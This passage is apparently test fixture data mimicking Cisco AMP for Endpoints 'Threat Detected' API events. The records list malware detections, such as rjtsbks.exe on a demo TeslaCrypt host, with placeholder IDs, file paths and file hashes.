Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196257","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":913000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228942","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":913000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228941","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":897000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 